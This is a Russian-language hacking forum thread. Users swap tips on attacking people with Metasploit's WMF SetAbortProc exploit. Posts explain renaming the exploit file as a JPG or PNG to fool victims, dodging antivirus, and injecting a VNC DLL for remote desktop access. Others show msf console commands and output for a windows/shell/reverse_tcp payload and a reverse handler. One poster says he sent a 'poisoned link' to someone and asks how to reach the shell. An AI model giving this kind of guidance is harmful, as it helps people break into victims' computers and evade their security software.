Все ьы хорошо, если бы еще работало гладко, сам wmf файл у меня не загружается, осел блокирует его, и приходится самому открывать заблокированное окно и нажать Открыть.
Кстати когде я пробовал делать такую же фишку с трояном (начинка window/download_exec), то там тоже все работало, но подтвержадать надо вручную..., а если врубить Каспера или Фаер дак вообще шансов ноль..., малоэффективная вещь...

А ты в курсе, что этот WMF файлик содержит и сам сплоит и начинку и его расширение можно переименовать в любое другое графическое (JPG, PNG, GIF) и он будет так же работать. Ну а впарить этот файл намного легче - так как он картинка. Что до антивирусов - конечно они палят паблик сплоит. Используй более свежие сплоиты...

Вообщем пробовал я локально поднять VNC-сервер состоящий из одной dll (vncdll.dll). Для этого я создал reg-файл следующего содержания (для того чтоб dll подгружалась, как расширение основной оболочки):
Положил dll в system32, проверил - dll подгрузилась к Total Commander, но порт не открылся, соответственно нет коннекта вьювером. В случае, если пользоваться MSF - то dll-ка успешно инжектируется во взломанный процесс и всё работает. Вообщем как поднять полноценный удалённый рабочий стол с помощью этой dll ? В чём трабл?

Хоел спросит у тебя о том же. Может какая-то их Export-функций отвечает за поднятие серваера. Я пробовал вызвать init без параметров. Открылать синее окно cmd Но порт не слушаеться. Lebed, появились какие-нибудь идеи за это время?

народ сори за ламерство конечно! Но я че то ваще ниче не понимаю кароч сделал я ядовитую ссылку впарил её пишет :
вроде все норм да?! а вот зайти никак не могу на шелл ! че делать?? если можно поподробнее плиззз
Да и как сделать что б антивирь не орал???

1. sessions -i 1 в консоли набери.
2. Попробуй запустить вьювер в ручную и одключится к взломанному компу.
Launched vnciewer in the background. ~ Вьювер запущен на заднем плане..

У меня накопилось несколько вопросов по 3ей версии. ответте пожайлуста.

1)

у меня адсл. вседствие чего адрес внешний\внутренний.

>> set LHOST 192.168.1.** (ввёл локальный адрес )

LHOST => 192.168.1.33

>> exploit
[*] Started reverse handler[*] Using URL: http://192.168.1.33:8080/9mcvPzU4ex(эта ссылка не запустилась у человека который сидит у моего же провайдера)[*] Server started.[*] Exploit running as background job.

>> set LHOST 88.147.173.*** (попробовал ввести внешний IP)

LHOST => 88.147.173.190

>> exploit
[*] Started reverse handler[*] Using URL: http://192.168.1.33:8080/EoUUDsz5V(всё равно прописываеться внутренний!)[*] Server started.[*] Exploit running as background job.

P/S. я слышал что возможно нужн овключить переадресацию NAT с внешнего на внутренний. только как это сделать?(ADSL zyxel 660 ru)

2)
>> set payload windows/shell/reverse_tcp

payload => windows/shell/reverse_tcp

msf exploit(ms06_001_wmf_setabortproc) >( в более ранних версиях вроде указывалась начинка. в 3 не указываеться?или я делаю что то не так?)


P/S Пробовал даже сам на себя заходить с IE6 (SP2)
c lдругой учётки. Файл скачался,но шела не появилось.Обьясните\помоги те пожайлуста.

p.p\s. тут вы сказали что файлик со сплойтом можн опереименовать..А есть параметр для задания его имени?

так кто нибудь может ответить?

Перезалей видео! пЛиzZZ